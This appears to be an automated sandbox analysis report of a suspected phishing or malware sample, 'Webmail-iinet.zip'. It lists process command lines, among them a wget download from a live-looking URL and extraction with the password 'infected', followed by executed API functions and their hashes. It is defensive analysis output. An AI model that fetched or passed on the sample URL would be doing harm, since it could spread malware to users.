Commandline:	C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip" > cmdline.out 2>&1
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:35:29
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:35:29
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\wget.exe
Wow64 process (32bit):	true
Commandline:	wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip"
Imagebase:	0x400000
File size:	3'895'184 bytes
MD5 hash:	3DADB6E2ECE9C4B3E1E322E617658B60
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:35:35
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\7za.exe
Wow64 process (32bit):	true
Commandline:	7za x -y -pinfected -o"C:\Users\user\Desktop\extract" "C:\Users\user\Desktop\download\Webmail-iinet.zip"
Imagebase:	0x610000
File size:	289'792 bytes
MD5 hash:	77E556CDFDC5C592F5C46DB4127C6F4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:35:35
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:35:36
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\unarchiver.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\download\Webmail-iinet.zip"
Imagebase:	0x840000
File size:	12'800 bytes
MD5 hash:	16FF3CC6CC330A08EED70CBC1D35F5D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:35:36
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\7za.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nwe5galq.xcu" "C:\Users\user\Desktop\download\Webmail-iinet.zip"
Imagebase:	0x610000
File size:	289'792 bytes
MD5 hash:	77E556CDFDC5C592F5C46DB4127C6F4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:35:36
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0xb10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	20.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.5%
Total number of Nodes:	73
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00D4B1D6 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 00D4B208

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 34348bf147518e3e9434377c8ebce6dd5c4d7c10526be9ceab46df6c0c72690b
Instruction ID: 355d48b7e7460ccbb8bb5db3e03ef8ce74a8cc8f7b0dcdfc0ac9d4bbc455c09f
Opcode Fuzzy Hash: 34348bf147518e3e9434377c8ebce6dd5c4d7c10526be9ceab46df6c0c72690b
Instruction Fuzzy Hash: 180178719042408FDB10CF15E885769FBA4EB55320F08C4AADD888F66AD3B9E408DAA6

Function 01400C99 Relevance: 2.6, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[Mj, xrefs: 01400D43, 01400D48
Pk, xrefs: 01400CC8

Memory Dump Source

Source File: 00000006.00000002.1718593918.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1400000_unarchiver.jbxd

Similarity

API ID:
String ID: Pk$[Mj
API String ID: 0-1308332693
Opcode ID: a71f7fbd51a8ed30997396094d8aec3b9c86b06f2697d76d2b8faeb00eab7269
Instruction ID: ff5c5f1a944bef5b141051cf4cf35c086d669ab281d8f2387fab05ad72fbccba
Opcode Fuzzy Hash: a71f7fbd51a8ed30997396094d8aec3b9c86b06f2697d76d2b8faeb00eab7269
Instruction Fuzzy Hash: 03214770B002508FCB11EB3A84113AE7BE69FC6754B94893DE585DB381DF7AA90787B1

Function 01400CA8 Relevance: 2.6, Strings: 2, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[Mj, xrefs: 01400D43, 01400D48
Pk, xrefs: 01400CC8

Memory Dump Source

Source File: 00000006.00000002.1718593918.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1400000_unarchiver.jbxd

Similarity

API ID:
String ID: Pk$[Mj
API String ID: 0-1308332693
Opcode ID: 210dcdbd0edd324da58f69cad2bd9b250a582064dc0279f0cb9b73d0866389e1
Instruction ID: 181609bae939fc89d1ceff1a05f5f9d36cdf7736e867c79cd51d57c9ee975e7e
Opcode Fuzzy Hash: 210dcdbd0edd324da58f69cad2bd9b250a582064dc0279f0cb9b73d0866389e1
Instruction Fuzzy Hash: 7E210230B042108FCB15EB3A84413AFB7E69FC5648B94883DE446DB785DF39A90787B2

Function 00D4B246 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 00D4B2F3

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 63f5c02d723babccdfa286fd8f0100189700abc8dfd69b0debd74d358d4b9d0b
Instruction ID: 3fff9b607fdede4f8e943a8afa2065c6de330fd8304a47119206112b01c8e1c6
Opcode Fuzzy Hash: 63f5c02d723babccdfa286fd8f0100189700abc8dfd69b0debd74d358d4b9d0b
Instruction Fuzzy Hash: 9931A671504384AFE7228F61DC44FA6BFBCEF05324F08849AE985DB562D774A909CB71

Function 00D4AD04 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 00D4ADA7

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a2d38c8b05e95f263f338a65498561c1cfee724635d970600b2802a005ae8c10
Instruction ID: 7f2e20d4c6d0bcada8c5f0292ff70d90d495f835035a64735b9af6bb79994a83
Opcode Fuzzy Hash: a2d38c8b05e95f263f338a65498561c1cfee724635d970600b2802a005ae8c10
Instruction Fuzzy Hash: D231D371404384AFEB228B65DC44FA7BFACEF05220F08889AF985DB552D324A809CB71

Function 00D4AB76 Relevance: 1.6, APIs: 1, Instructions: 94
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00D4AC36

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: 64acd834df00670459c5a785e4b7cf2cf24f3de32c6599c43f35ac0016dc399b
Instruction ID: 35a95b107d46e04c75d81f1e7272fd4978b547aa1bf73b17a9fa8510e61b0b2f
Opcode Fuzzy Hash: 64acd834df00670459c5a785e4b7cf2cf24f3de32c6599c43f35ac0016dc399b
Instruction Fuzzy Hash: 43316D7250E3C06FD3138B658CA5A65BFB4AF47210F1E84CBD8C4DF5A3D2296919C7A2

Function 00D4A5DC Relevance: 1.6, APIs: 1, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00D4A67D

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7fbf7380c369a5af99d437f1c3e40ce04a040d22f7bf5c365a7549db38533152
Instruction ID: 3278dfa1f94bc8ad43c9dbceaabd8f6478461fee9ccdc4a9d4e7c55d08c3efee
Opcode Fuzzy Hash: 7fbf7380c369a5af99d437f1c3e40ce04a040d22f7bf5c365a7549db38533152
Instruction Fuzzy Hash: 04319171504780AFE721CF65DC44F66BBE8EF05220F08889EE9859B652D375E809CB76

Function 00D4A120 Relevance: 1.6, APIs: 1, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00D4A1C2

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 2b43b9c139ff2c063e63e5a393faf89cdf69682042c8087708e664329bfe4361
Instruction ID: b63f96ef0a776e5880327132f18ff7ac81366c25eb4a8d1330ff3283cfa25139
Opcode Fuzzy Hash: 2b43b9c139ff2c063e63e5a393faf89cdf69682042c8087708e664329bfe4361
Instruction Fuzzy Hash: F221247150D3C06FD3028B218C51BA6BFB4EF87220F0981CBD8C4DF693D225A91AC7A2

Function 00D4B276 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 00D4B2F3

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fc09e4c38bafa8c9b6222829f4243908c017514d3216f2d925b822d4ae839501
Instruction ID: 047ad3d3cd126d1f583462ce896c45ecfc428e76221ef7e0d564b94d44c0c4ec
Opcode Fuzzy Hash: fc09e4c38bafa8c9b6222829f4243908c017514d3216f2d925b822d4ae839501
Instruction Fuzzy Hash: BF21C172500204AFEB21DF61DC44FAAFBECEF04324F08886AE985DB651D774E5089BB5

Function 00D4A370 Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,7DB1335F,00000000,00000000,00000000,00000000), ref: 00D4A40C

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 62daa3ba91f10ecfdcb893a4bf9c466f728eb622094e08389aa170590d510740
Instruction ID: cbb21409c4064807aede859bae942a540a8e677724d73f45b5341516eba0be3a
Opcode Fuzzy Hash: 62daa3ba91f10ecfdcb893a4bf9c466f728eb622094e08389aa170590d510740
Instruction Fuzzy Hash: E6217C75504384AFD721CF55DC84FA6BBF8AF05620F08849AE9859B262D764E908CB72

Function 00D4AD2A Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 00D4ADA7

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 66d83bf32210a0caba8de75a50112db061f0f79757543ae7d78f2b732d8cf7f4
Instruction ID: c04ca67e9e5eac2f17ba54a35e04dad4cb4fe1a44b61164850971363a97d7f34
Opcode Fuzzy Hash: 66d83bf32210a0caba8de75a50112db061f0f79757543ae7d78f2b732d8cf7f4
Instruction Fuzzy Hash: 0221B571500244AFEB21CF55DC44FABFBECEF04314F04845AE9459BA51E774E5588B71

Function 00D4A850 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,00000E24,7DB1335F,00000000,00000000,00000000,00000000), ref: 00D4A8DE

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4788580362adddcd645a224227702986b40b46c4cb8b099f96ae9682eda1ea21
Instruction ID: 887d4fda95a5567cb85b09ab5f2efae86b746e4c548c686dfe310de44f7b2ced
Opcode Fuzzy Hash: 4788580362adddcd645a224227702986b40b46c4cb8b099f96ae9682eda1ea21
Instruction Fuzzy Hash: 7721D371408380AFE7228B54DC44FA6BFB8EF46724F0884DAE984DF553C274A909CB76

Function 00D4A933 Relevance: 1.6, APIs: 1, Instructions: 77
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,00000E24,7DB1335F,00000000,00000000,00000000,00000000), ref: 00D4A9C1

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3c01d6f55d4e001dd42841875b20a65debc05cf10fcd2ccf1c0deca82d228665
Instruction ID: 44910931c9befe57895abdc6ba9110e1fa601ebd2cb4b124104e4dfe0f6aead5
Opcode Fuzzy Hash: 3c01d6f55d4e001dd42841875b20a65debc05cf10fcd2ccf1c0deca82d228665
Instruction Fuzzy Hash: A721A171409380AFDB22CF55DC44FA6BFB8EF06314F08849AE9859F162C375A508CB76

Function 00D4A5FE Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00D4A67D

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d01231cc190130d4ca26bdbbe883d3986ef31a67cd6da1d31907c934019c948a
Instruction ID: 641e959ec046403022971177d6e5cdf654720391b384a3b8336f5a17ee647e54
Opcode Fuzzy Hash: d01231cc190130d4ca26bdbbe883d3986ef31a67cd6da1d31907c934019c948a
Instruction Fuzzy Hash: 6321AE71500640AFEB20DF25DD45F66FBE8EF08320F088869E9858B651D771E808CB76

Function 00D4A78F Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,7DB1335F,00000000,00000000,00000000,00000000), ref: 00D4A815

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 30aba9c3870e59d22031a4ab670a463a49db01f8224370cf37dc0e4c5fd62e2e
Instruction ID: fb24c04c93074e7ca6ea3b5b1b295e939230fdc8a5584616c25d1477cfdd7643
Opcode Fuzzy Hash: 30aba9c3870e59d22031a4ab670a463a49db01f8224370cf37dc0e4c5fd62e2e
Instruction Fuzzy Hash: 6121D5B54083C06FE7128B11DC40BA6BFB8EF47324F0880DAE9859F293D264A90DC776

Function 00D4AA0B Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00D4AA8B

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: fb48512d71909ac3ba590bc826f5ca9146677ec4c1e82e4df53e46267bcbd80a
Instruction ID: c48cb1d383680758f3df97fb5f7f22d37b699df638ed71f0f0899e778e7eb110
Opcode Fuzzy Hash: fb48512d71909ac3ba590bc826f5ca9146677ec4c1e82e4df53e46267bcbd80a
Instruction Fuzzy Hash: 94217F755083C05FDB12CB29DC55B92BFE8AF06324F0D84EAE884CF153D265D909CB61

Function 00D4A392 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,7DB1335F,00000000,00000000,00000000,00000000), ref: 00D4A40C

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f5e21018d456ff8f5253a27eb064c60a81ed4afc901a0a92dcc6e592d6bf05b0
Instruction ID: 2c907713a35cb8181ebf81e469d437d83fafeeb7f3448bfc91d8235bef640955
Opcode Fuzzy Hash: f5e21018d456ff8f5253a27eb064c60a81ed4afc901a0a92dcc6e592d6bf05b0
Instruction Fuzzy Hash: 5D2190756002449FE720CF55DC88FABF7ECEF04710F08845AE94A9B651E7B0E809CA76

Function 00D4A962 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E24,7DB1335F,00000000,00000000,00000000,00000000), ref: 00D4A9C1

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c01847bad6a601f2f1c415e2ac883700bd86c981cfd5cc736fdca66d261f722f
Instruction ID: 67e5a949217984e1c046a24acc5e5250a87638f00d336f03c332976b6da4032a
Opcode Fuzzy Hash: c01847bad6a601f2f1c415e2ac883700bd86c981cfd5cc736fdca66d261f722f
Instruction Fuzzy Hash: E0110172500240AFEB21CF55DC40FAAFBE8EF04324F08845AE9459B651D774A548CBB6

Function 00D4A882 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000E24,7DB1335F,00000000,00000000,00000000,00000000), ref: 00D4A8DE

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c4391dd6a4f5c934abd776181c2dc160fbc44f3be7f1f34f5e6e523f6ced7116
Instruction ID: d15d3a43bed865c3b9ab348d16dca7f8b682ca1f524a8ce6326fc7c7fdc250f9
Opcode Fuzzy Hash: c4391dd6a4f5c934abd776181c2dc160fbc44f3be7f1f34f5e6e523f6ced7116
Instruction Fuzzy Hash: 5911C172500240AFEB21CF54DC44BAAFBA8EF44324F18845AE9459B655D774A9088BB6

Function 00D4A2AE Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00D4A30C

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 24b18a0d91a6fcd24feb2b9c9eb72648669a7b337d585fb8baac4a693193acf5
Instruction ID: 1c1857cbb25a09c20409b1fca98585c7ad3b2f1229fe7551c83cdcf027142aa9
Opcode Fuzzy Hash: 24b18a0d91a6fcd24feb2b9c9eb72648669a7b337d585fb8baac4a693193acf5
Instruction Fuzzy Hash: 66115E758493C09FDB228B25DC95A52BFB4DF17220F0D84DBED858F263D265A809CB72

Function 00D4AA46 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00D4AA8B

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 03ad7c8ae1c85d21644e6bfe3c83790d1d3ffeedf58ea0e0aaddbfb0571008a4
Instruction ID: 5f54e49bb18a515c53d8a38c71e6cb3e389a37b1e26656e032105270af21bb6a
Opcode Fuzzy Hash: 03ad7c8ae1c85d21644e6bfe3c83790d1d3ffeedf58ea0e0aaddbfb0571008a4
Instruction Fuzzy Hash: DB115E75A042409FEB10CF19D985B66BBD8EF04320F0CC4AADD49CB656E775E908CA72

Function 00D4A7C2 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E24,7DB1335F,00000000,00000000,00000000,00000000), ref: 00D4A815

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 7aac61716d8fc61b6b7a6b782fa398652b72909989221ca557211d36fc5fc553
Instruction ID: fad9fc09d44689c167f676945bc0439e5aeb0029a144d1d855a2e257c1a7f597
Opcode Fuzzy Hash: 7aac61716d8fc61b6b7a6b782fa398652b72909989221ca557211d36fc5fc553
Instruction Fuzzy Hash: 2E01C471504240AFE720CB05DC45BBAB798DF44724F18C09AED459B752E774E80D8AB6

Function 00D4AF8B Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 00D4AFE4

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 98a69389c46e4a61420192a527c02b9a673b5ff692a5eae7914623c1641fae68
Instruction ID: f48f386baa495800b5bb496dd7c9a632b969894191f03ad5188c24dc2d33385b
Opcode Fuzzy Hash: 98a69389c46e4a61420192a527c02b9a673b5ff692a5eae7914623c1641fae68
Instruction Fuzzy Hash: F0115A755093C09FDB128B25DC85A52BFF8EF06220F0D84DBED858B263D365A858DB62

Function 00D4B1B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 00D4B208

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: ce02058e3a0012603100b4fc541b2c207d2f35e803353c22a049a1e64582b868
Instruction ID: 7bd01f6b7a591dd41f900812ec12835fe673a34106eff11ee26dedd3f055f767
Opcode Fuzzy Hash: ce02058e3a0012603100b4fc541b2c207d2f35e803353c22a049a1e64582b868
Instruction Fuzzy Hash: 17115E715093809FDB128F25DC84B56BFA4DF56220F0884DAED848F267D275A908CB62

Function 00D4A172 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00D4A1C2

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 0e3d95346a02442a2d997697805a24dd57bfc727d76206cf27185074ea4f534a
Instruction ID: b817b3b3dabda5d0fc785f43aafe8a54b9a5f75519e1103cc705a63ea3958107
Opcode Fuzzy Hash: 0e3d95346a02442a2d997697805a24dd57bfc727d76206cf27185074ea4f534a
Instruction Fuzzy Hash: 8E01B171600200AFD310DF16DC45B76FBE8EB88A20F14816AED089BB41D735B915CBE5

Function 00D4ABE6 Relevance: 1.5, APIs: 1, Instructions: 47pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00D4AC36

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: 36dac38f0d0c70b589e61ff00aa58f9f689efc1ba85b164d38f9f93205366cf3
Instruction ID: fc8839494e73a07550c6444cb7fe61df9979601455a9d673ffb78fc7a3887e9b
Opcode Fuzzy Hash: 36dac38f0d0c70b589e61ff00aa58f9f689efc1ba85b164d38f9f93205366cf3
Instruction Fuzzy Hash: F501B171600200AFD310DF16DC45B76FBE8FB88A20F14812AED489BB41D731B915CBE5

Function 00D4AFB2 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 00D4AFE4

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
